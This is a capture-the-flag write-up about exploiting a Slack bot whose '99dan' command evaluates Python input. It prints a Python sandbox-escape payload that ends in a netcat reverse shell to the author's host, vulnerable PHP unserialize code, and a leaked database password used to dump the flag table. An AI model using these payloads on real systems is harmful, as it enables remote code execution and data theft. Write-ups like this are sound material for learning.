Organizers manually invite competitors to hidebot.slack.com slack channel. They says I can use hidebot, hidebot2~7, on query. Usage on public channel is prohibited by organizers.
To check the functionalities of the bot, they says they can use @hidesbot help command.
idk:
@hidesbot3 help
hidesbot3:
[*] Command list
- notice num
- 99dan num
- lolstat nick
- lol_notice
Currently, lolstat/lol_notice is not available.
Please use the website(http://52.175.145.142/lol/)
The website didn't seem to have some visible vulnerabilities.
notice
command only accepts number between 0 ~ 12.lolstat
does not work.lol_notice
works same asnotice
command.99dan
command's result is interesting.
request:response
1:1*1=1~1*9*9
1a:error
(1):empty
(1+1):empty
(1+1a):error
I did doubt that it is processed by a language. First I assumed it as python.
__import__('os').system('ls'):no hack
?! no hack?
'\x39':empty
0x9:empty
int('9'):empty
int("9"):empty
int('9')z:error
I certainly thought that it was python.
open('/etc/passwd'):empty
open('./flag'):error
Aww.. no flag. And there are some filters.
sys:no hack
__import__:no hack
I tried a traditional sandbox escape payload for python on CTFs.
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__
(empty)
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache']
(empty)
...
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('busybox nc <my ip> <my port> -e sh')
?! shell acheived! There are source code of the website, as backup zip archive. (b4ckup4u.zip) Database connection information is redacted.
config.php:
<?php
$hostname = "localhost";
$user = "########";
$password = "########";
$dbname = "########";
$q = mysql_connect($hostname, $user, $password) or die("db error");
mysql_select_db($dbname, $q) or die("db error2");
?>
There was unserialize vulnerabity, and there seems to be intended mysql query function.
read.php:
<?php
include "config.php";
include "uclass.php";
$article_no = mysql_real_escape_string($_POST['no']);
$id = mysql_real_escape_string($_POST['uid']);
$pw = mysql_real_escape_string($_POST['upw']);
if(isset($_COOKIE['u']) && isset($article_no)){
$obj = unserialize(base64_decode($_COOKIE['u']));
ob_start();
echo $obj->r();
...
uclass.php:
<?php
include "config.php";
class Go
{
private $t = "board";
public function r()
{
$q = "SELECT * FROM {$this->t} WHERE 1";
$r = mysql_query($q) or die(mysql_error());
$row = mysql_fetch_row($r);
$arr = json_encode(array('subject'=>$row[1], 'content'=>$row[3]));
return $arr;
}
public function b()
{
$q = "SELECT * FROM {$this->t}";
$r = mysql_query($q) or die(mysql_error());
$row = mysql_fetch_row($r);
}
}
?>
I could use the class for querying database, but I have shell, and there are mysql client binary. There were config.php on /var/www/html too.
So I executed these commands:
mysql -uhidebot -p'lolbot!@#' lol
SHOW TABLES;
(pressed Ctrl+D)
Tables_in_lol
santa
board
mysql -uhidebot -p'lolbot!@#' lol
SELECT * FROM santa;
(pressed Ctrl+D)
<flag>
I forgot the flag.